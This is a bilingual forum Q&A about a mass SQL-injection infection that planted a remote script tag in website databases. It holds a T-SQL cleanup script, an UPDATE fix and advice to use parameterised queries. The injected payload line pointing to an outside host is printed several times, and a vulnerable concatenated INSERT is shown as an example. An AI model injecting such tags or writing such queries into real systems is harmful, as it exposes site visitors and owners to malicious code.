解读这个XSS攻击 [英] Deciphering this XSS attack
问题描述
有没有人知道有关此攻击的更多信息?
Did anybody know more information about this attack ?
我最近在我的网站上注入了此脚本
I recently got this script injected in my web sites
顺便说一句,不要进入这个网站,因为它是感染的来源
By the way dont go on this web site since it's the source of the infection
</title><script src=http://google-stats50.**fo/***.php>
它是什么类型的攻击,SQL或CODE?
What kind of attack is it, SQL or CODE ?
顺便说一下,不要去这个网站,因为它是感染的来源
By the way dont go on this web site since it's the source of the infection
问题是这种传染性攻击发生了什么样的攻击?
The question is by what quind of attack this infectious attack occurs ?
我们发现它,并不像twitter攻击,它是通过url中的请求参数并注入sql直接在参数中。
We found it, and was not like twitter attack, it's was by request parameters in a url and inject sql directly in the parameter.
我们的sql团队生成的SQL脚本用于清理被感染的数据库
There is the SQL script produce by our sql team to clean your database who was infected
/*************************************************************************
SQL INJECTED DATABASE
*************************************************************************/
DECLARE @dbName VARCHAR(200),
@SqlString NVARCHAR(MAX),
@SearchText VARCHAR(MAX),
@SearchTextLike VARCHAR(MAX),
@NbItems INT,
@TableName VARCHAR(255),
@ColoneName VARCHAR(255),
@objId BIGINT,
@tmpSqlString NVARCHAR(MAX),
@CleanUp BIT,
@RowCount BIGINT,
@debug BIT,
@Msg VARCHAR(MAX);
SET @debug = 0; -- 1 = Additionnal prints
SET @CleanUp = 0; -- 1 = Update tables
SET @SearchText = '</title><script src=http://google-stats50.info/ur.php></script>';
SET @SearchTextLike = '%' + @SearchText + '%';
DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255));
DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255));
DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX));
DECLARE @DbToValidate TABLE (DbName VARCHAR(255));
INSERT INTO @DbToValidate
SELECT Name
FROM sys.databases
WHERE [state] = 0 AND
Name NOT IN ('master', 'tempdb', 'model', 'msdb') AND
Name NOT LIKE 'sys%'
ORDER BY Name;
DECLARE db_cusor CURSOR FOR
SELECT DbName
FROM @DbToValidate;
OPEN db_cusor;
FETCH NEXT FROM db_cusor
INTO @dbName;
WHILE @@FETCH_STATUS = 0
BEGIN
SET @Msg = 'Traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0
BEGIN
IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName;
--Vider le contenu
DELETE FROM @QueryResults;
IF @debug = 1 PRINT '2 - Vider la table @QueryResults';
IF @CleanUp = 0
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''';
END
ELSE
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%'''
END
INSERT INTO @QueryResults
EXEC sp_executesql @SqlString;
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTPRINC
END
IF @debug = 1 PRINT '3 - Récupérer les Query String';
--Faire une loop sur les querys string pour voir s'il y a des injections SQL
DECLARE query_cursor CURSOR FOR
SELECT SqlString, TableName, ColoneName
FROM @QueryResults;
OPEN query_cursor;
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
IF @debug = 1 PRINT '4 - Cursor sur les Query String';
WHILE @@FETCH_STATUS = 0
BEGIN
SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');'
EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF ISNULL(@objId, -1) <> -1
BEGIN
SET @SqlString = 'USE [' + @dbName + '];' + @SqlString;
IF @CleanUp = 0
BEGIN
EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output
END
ELSE
BEGIN
EXEC sp_executesql @SqlString
SET @RowCount = @@ROWCOUNT
END
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF @CleanUp = 0
BEGIN
IF ISNULL(@NbItems, 0) <> 0
BEGIN
-- BD Infectée !
INSERT INTO @InfectedDB VALUES (@dbName);
PRINT '**** BD Infectée : ' + @dbName;
SELECT * FROM @InfectedDB;
BREAK;
END
END
ELSE
BEGIN
IF @RowCount <> 0
BEGIN
SET @Msg = '**** Table --> [' + @TableName + '] .::. Colonne --> [' + @ColoneName + '] .::. Nb Rows --> ' + CAST(@RowCount AS VARCHAR(7));
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
END
END
NEXTINNER:
-- Get the next query.
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
END
CLOSE query_cursor;
DEALLOCATE query_cursor;
IF @debug = 1 PRINT '5 - Vider cursor query';
END
ELSE
BEGIN
SET @Msg = '**** La base de données n''est pas ''ONLINE''.';
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
SET @Msg = 'Fin traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
NEXTPRINC:
-- Get the next database.
FETCH NEXT FROM db_cusor
INTO @dbName;
END
IF @CleanUp = 0
BEGIN
SELECT * FROM @InfectedDB;
END
ELSE
BEGIN
SELECT * FROM @CleanedUpDB;
END
GOTO FIN
FININNER:
CLOSE query_cursor;
DEALLOCATE query_cursor;
FIN:
--Fermeture du cursor
CLOSE db_cusor;
DEALLOCATE db_cusor;
推荐答案
刚好发生在我们身上。几乎每个数据库中的记录。
Just happened to us as well. Almost every record in the database.
最好的办法是做到以下几点:(我们刚刚成功完成)
The best bet is to do the following: (we have just done this successfully)
UPDATE [mytable] set [column] =
REPLACE([column],
'</title><script src=http://google-stats50.info/ur.php>',
'')
该行将从每个字段中删除脚本。您必须手动检查字段并更改UPDATE语句以适应。
That line will remove the script from each field. You will have to manually check the fields though and change the UPDATE statement to suit.
我猜是每个你们其中一个人的网站上有一个提交按钮的表格。我也猜测表单操作涉及带有连接sql的sql语句?
I am taking a guess that every one of you has a form on your website with a submit button. I am also guessing that the forms action involves a sql statement with concatenated sql?
"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES ('" & \
name & "', '" & email & "', '" & enquiry & "');"
如果是这种情况,你会被SQL注入攻击,你应该更改所有使用它的语句参数化查询的语法
If this is the case, you got SQL injection hacked and you should probably change all statements that use this syntax to "parameterised queries"
"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);"
sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz
希望这会有所帮助..
Hopefully this helps..
这篇关于解读这个XSS攻击的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
